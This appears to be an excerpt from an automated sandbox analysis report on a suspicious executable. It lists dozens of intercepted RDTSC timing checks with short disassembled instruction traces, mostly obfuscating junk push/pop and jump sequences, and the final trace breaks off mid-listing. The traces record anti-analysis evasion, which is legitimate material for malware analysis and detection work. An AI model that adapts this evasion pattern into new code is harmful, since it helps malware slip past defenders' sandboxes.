Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 81FBD4 second address: 81FC2B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 jmp 00007FF0EC517C81h 0x0000000a jmp 00007FF0EC517C85h 0x0000000f popad 0x00000010 pop ebx 0x00000011 ja 00007FF0EC517C9Eh 0x00000017 push ebx 0x00000018 pushad 0x00000019 popad 0x0000001a pushad 0x0000001b popad 0x0000001c pop ebx 0x0000001d js 00007FF0EC517C92h 0x00000023 jmp 00007FF0EC517C86h 0x00000028 push eax 0x00000029 push edx 0x0000002a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 829A09 second address: 829A0D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 829A0D second address: 829A13 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 829A13 second address: 829A40 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF0EC6B64CFh 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a pushad 0x0000000b popad 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 push edx 0x00000013 push ebx 0x00000014 jmp 00007FF0EC6B64CEh 0x00000019 pop ebx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 829A40 second address: 829A48 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 829A48 second address: 829A4C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 829B98 second address: 829B9E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 83BB4A second address: 83BB5E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF0EC6B64CFh 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 84982B second address: 84984D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FF0EC517C88h 0x0000000a popad 0x0000000b push edx 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 850711 second address: 85071B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007FF0EC6B64C6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 85071B second address: 850721 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 850721 second address: 850727 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 850727 second address: 85073A instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jno 00007FF0EC517C76h 0x00000009 jns 00007FF0EC517C76h 0x0000000f pop ebx 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 85073A second address: 850740 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 850899 second address: 8508B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 jnc 00007FF0EC517C76h 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 pop edx 0x00000016 pushad 0x00000017 push edi 0x00000018 pop edi 0x00000019 pushad 0x0000001a popad 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8508B6 second address: 8508BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 850B89 second address: 850B93 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FF0EC517C7Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 850E73 second address: 850E79 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 856EA9 second address: 856EC0 instructions: 0x00000000 rdtsc 0x00000002 js 00007FF0EC517C76h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007FF0EC517C7Dh 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 856EC0 second address: 856EC5 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 856EC5 second address: 856ED5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push edx 0x00000008 jnp 00007FF0EC517C7Ch 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 866610 second address: 866619 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 866619 second address: 86661D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 88A9D5 second address: 88A9F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF0EC6B64D8h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 88A9F1 second address: 88AA09 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 jo 00007FF0EC517C76h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jl 00007FF0EC517C7Ch 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8898F5 second address: 889905 instructions: 0x00000000 rdtsc 0x00000002 js 00007FF0EC6B64D2h 0x00000008 ja 00007FF0EC6B64C6h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 889905 second address: 88990E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push eax 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 88990E second address: 88991E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF0EC6B64CAh 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 88991E second address: 88992F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 ja 00007FF0EC517C78h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 889BF3 second address: 889BFE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jng 00007FF0EC6B64C6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 889BFE second address: 889C1D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 jnc 00007FF0EC517C7Ch 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jbe 00007FF0EC517C7Ch 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 889C1D second address: 889C39 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 jmp 00007FF0EC6B64D6h 0x0000000a pop ecx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 889C39 second address: 889C45 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FF0EC517C7Eh 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 88A6C2 second address: 88A6C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 88A6C8 second address: 88A6CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 88A6CC second address: 88A6D6 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 88A6D6 second address: 88A6DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 88BF54 second address: 88BF58 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 88BF58 second address: 88BF6E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF0EC517C7Ch 0x00000009 jno 00007FF0EC517C76h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 88BF6E second address: 88BF72 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 88BF72 second address: 88BFA7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007FF0EC517C76h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push edx 0x0000000d jg 00007FF0EC517C76h 0x00000013 jg 00007FF0EC517C76h 0x00000019 pop edx 0x0000001a pop edx 0x0000001b pop eax 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007FF0EC517C87h 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 890491 second address: 8904C4 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FF0EC6B64CCh 0x00000008 jl 00007FF0EC6B64C6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 pushad 0x00000012 jg 00007FF0EC6B64C8h 0x00000018 pushad 0x00000019 jmp 00007FF0EC6B64D6h 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 890835 second address: 89088B instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jmp 00007FF0EC517C7Ah 0x00000008 pop ecx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push ecx 0x0000000d push edi 0x0000000e pushad 0x0000000f popad 0x00000010 pop edi 0x00000011 pop ecx 0x00000012 mov eax, dword ptr [esp+04h] 0x00000016 push ebx 0x00000017 jmp 00007FF0EC517C88h 0x0000001c pop ebx 0x0000001d mov eax, dword ptr [eax] 0x0000001f push edx 0x00000020 jmp 00007FF0EC517C7Fh 0x00000025 pop edx 0x00000026 mov dword ptr [esp+04h], eax 0x0000002a push eax 0x0000002b push edx 0x0000002c push ecx 0x0000002d jc 00007FF0EC517C76h 0x00000033 pop ecx 0x00000034 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 893A96 second address: 893A9A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 893A9A second address: 893AA0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 893AA0 second address: 893AAC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 893AAC second address: 893AB0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8956A1 second address: 8956C4 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FF0EC6B64C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push esi 0x0000000b jng 00007FF0EC6B64C6h 0x00000011 jc 00007FF0EC6B64C6h 0x00000017 pop esi 0x00000018 popad 0x00000019 push eax 0x0000001a push edx 0x0000001b jbe 00007FF0EC6B64CCh 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8956C4 second address: 8956C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8956C8 second address: 8956D2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnl 00007FF0EC6B64C6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4F50390 second address: 4F50394 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4F50394 second address: 4F503AB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF0EC6B64D3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4F50469 second address: 4F5046F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4F5046F second address: 4F50473 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4F50473 second address: 4F50477 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4F50477 second address: 4F504D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esp 0x00000009 pushad 0x0000000a pushfd 0x0000000b jmp 00007FF0EC6B64D2h 0x00000010 jmp 00007FF0EC6B64D5h 0x00000015 popfd 0x00000016 jmp 00007FF0EC6B64D0h 0x0000001b popad 0x0000001c mov dword ptr [esp], ebp 0x0000001f pushad 0x00000020 jmp 00007FF0EC6B64CEh 0x00000025 push eax 0x00000026 push edx 0x00000027 push eax 0x00000028 push edx 0x00000029 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4F504D1 second address: 4F504D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4F504D5 second address: 4F504D9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4F50524 second address: 4F5053F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF0EC517C87h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4F5053F second address: 4F50545 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4F50545 second address: 4F50549 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4F50549 second address: 4F5054D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4F5054D second address: 4F50591 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 call 00007FF15CB3B713h 0x0000000d push 755727D0h 0x00000012 push dword ptr fs:[00000000h] 0x00000019 mov eax, dword ptr [esp+10h] 0x0000001d mov dword ptr [esp+10h], ebp 0x00000021 lea ebp, dword ptr [esp+10h] 0x00000025 sub esp, eax 0x00000027 push ebx 0x00000028 push esi 0x00000029 push edi 0x0000002a mov eax, dword ptr [75600140h] 0x0000002f xor dword ptr [ebp-04h], eax 0x00000032 xor eax, ebp 0x00000034 push eax 0x00000035 mov dword ptr [ebp-18h], esp 0x00000038 push dword ptr [ebp-08h] 0x0000003b mov eax, dword ptr [ebp-04h] 0x0000003e mov dword ptr [ebp-04h], FFFFFFFEh 0x00000045 mov dword ptr [ebp-08h], eax 0x00000048 lea eax, dword ptr [ebp-10h] 0x0000004b mov dword ptr fs:[00000000h], eax 0x00000051 ret 0x00000052 pushad 0x00000053 push edi 0x00000054 jmp 00007FF0EC517C88h 0x00000059 pop ecx 0x0000005a call 00007FF0EC517C7Bh 0x0000005f mov esi, 26B0FC5Fh 0x00000064 pop esi 0x00000065 popad 0x00000066 and dword ptr [ebp-04h], 00000000h 0x0000006a push eax 0x0000006b push edx 0x0000006c push eax 0x0000006d push edx 0x0000006e push eax 0x0000006f push edx 0x00000070 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4F50591 second address: 4F50595 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4F50595 second address: 4F50599 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4F50599 second address: 4F5059F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4F5059F second address: 4F505CC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF0EC517C7Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov edx, dword ptr [ebp+0Ch] 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FF0EC517C85h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4F505CC second address: 4F50601 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov si, dx 0x00000006 jmp 00007FF0EC6B64D3h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov esi, edx 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FF0EC6B64D5h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4F50601 second address: 4F50611 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF0EC517C7Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4F50611 second address: 4F50615 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4F50722 second address: 4F50727 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4F50727 second address: 4F50738 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 movsx edx, si 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a dec edi 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4F50738 second address: 4F5073E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4F5073E second address: 4F50744 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4F50744 second address: 4F50748 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4F50748 second address: 4F50786 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF0EC6B64D4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b lea ebx, dword ptr [edi+01h] 0x0000000e jmp 00007FF0EC6B64D0h 0x00000013 mov al, byte ptr [edi+01h] 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007FF0EC6B64CAh 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4F50786 second address: 4F5078C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4F5078C second address: 4F50819 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF0EC6B64CEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 inc edi 0x0000000a jmp 00007FF0EC6B64D0h 0x0000000f test al, al 0x00000011 pushad 0x00000012 mov si, 146Dh 0x00000016 jmp 00007FF0EC6B64CAh 0x0000001b popad 0x0000001c jne 00007FF15CCCE784h 0x00000022 pushad 0x00000023 jmp 00007FF0EC6B64CEh 0x00000028 popad 0x00000029 mov ecx, edx 0x0000002b jmp 00007FF0EC6B64D7h 0x00000030 shr ecx, 02h 0x00000033 jmp 00007FF0EC6B64D6h 0x00000038 rep movsd 0x0000003a rep movsd 0x0000003c rep movsd 0x0000003e rep movsd 0x00000040 rep movsd 0x00000042 push eax 0x00000043 push edx 0x00000044 push eax 0x00000045 push edx 0x00000046 jmp 00007FF0EC6B64CAh 0x0000004b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4F50819 second address: 4F50828 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF0EC517C7Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4F50828 second address: 4F508AD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007FF0EC6B64CFh 0x00000008 pop eax 0x00000009 mov cx, bx 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f mov ecx, edx 0x00000011 jmp 00007FF0EC6B64CBh 0x00000016 and ecx, 03h 0x00000019 pushad 0x0000001a pushfd 0x0000001b jmp 00007FF0EC6B64D4h 0x00000020 and esi, 3D6926B8h 0x00000026 jmp 00007FF0EC6B64CBh 0x0000002b popfd 0x0000002c push eax 0x0000002d mov ecx, edi 0x0000002f pop edi 0x00000030 popad 0x00000031 rep movsb 0x00000033 jmp 00007FF0EC6B64CEh 0x00000038 mov dword ptr [ebp-04h], FFFFFFFEh 0x0000003f jmp 00007FF0EC6B64D0h 0x00000044 mov eax, ebx 0x00000046 pushad 0x00000047 push eax 0x00000048 push edx 0x00000049 movzx eax, dx 0x0000004c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4F508AD second address: 4F508DF instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushfd 0x00000007 jmp 00007FF0EC517C85h 0x0000000c jmp 00007FF0EC517C7Bh 0x00000011 popfd 0x00000012 popad 0x00000013 mov ecx, dword ptr [ebp-10h] 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b popad 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4F508DF second address: 4F508E5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4F508E5 second address: 4F5094A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF0EC517C7Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr fs:[00000000h], ecx 0x00000010 jmp 00007FF0EC517C80h 0x00000015 pop ecx 0x00000016 pushad 0x00000017 jmp 00007FF0EC517C7Eh 0x0000001c pushfd 0x0000001d jmp 00007FF0EC517C82h 0x00000022 and ax, 2A98h 0x00000027 jmp 00007FF0EC517C7Bh 0x0000002c popfd 0x0000002d popad 0x0000002e pop edi 0x0000002f push eax 0x00000030 push edx 0x00000031 pushad 0x00000032 mov dx, C986h 0x00000036 push edi 0x00000037 pop eax 0x00000038 popad 0x00000039 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4F5094A second address: 4F50980 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF0EC6B64D8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop esi 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FF0EC6B64D7h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4F50980 second address: 4F50524 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cl, dl 0x00000005 jmp 00007FF0EC517C80h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pop ebx 0x0000000e pushad 0x0000000f pushfd 0x00000010 jmp 00007FF0EC517C7Eh 0x00000015 jmp 00007FF0EC517C85h 0x0000001a popfd 0x0000001b mov esi, 35FA5CD7h 0x00000020 popad 0x00000021 leave 0x00000022 pushad 0x00000023 mov ah, 0Fh 0x00000025 jmp 00007FF0EC517C85h 0x0000002a popad 0x0000002b retn 0008h 0x0000002e cmp dword ptr [ebp-2Ch], 10h 0x00000032 mov eax, dword ptr [ebp-40h] 0x00000035 jnc 00007FF0EC517C75h 0x00000037 push eax 0x00000038 lea edx, dword ptr [ebp-00000590h] 0x0000003e push edx 0x0000003f call esi 0x00000041 push 00000008h 0x00000043 pushad 0x00000044 movsx ebx, si 0x00000047 mov si, 4EBFh 0x0000004b popad 0x0000004c push 08E154FDh 0x00000051 jmp 00007FF0EC517C7Bh 0x00000056 xor dword ptr [esp], 7DBF48D5h 0x0000005d push eax 0x0000005e push edx 0x0000005f push eax 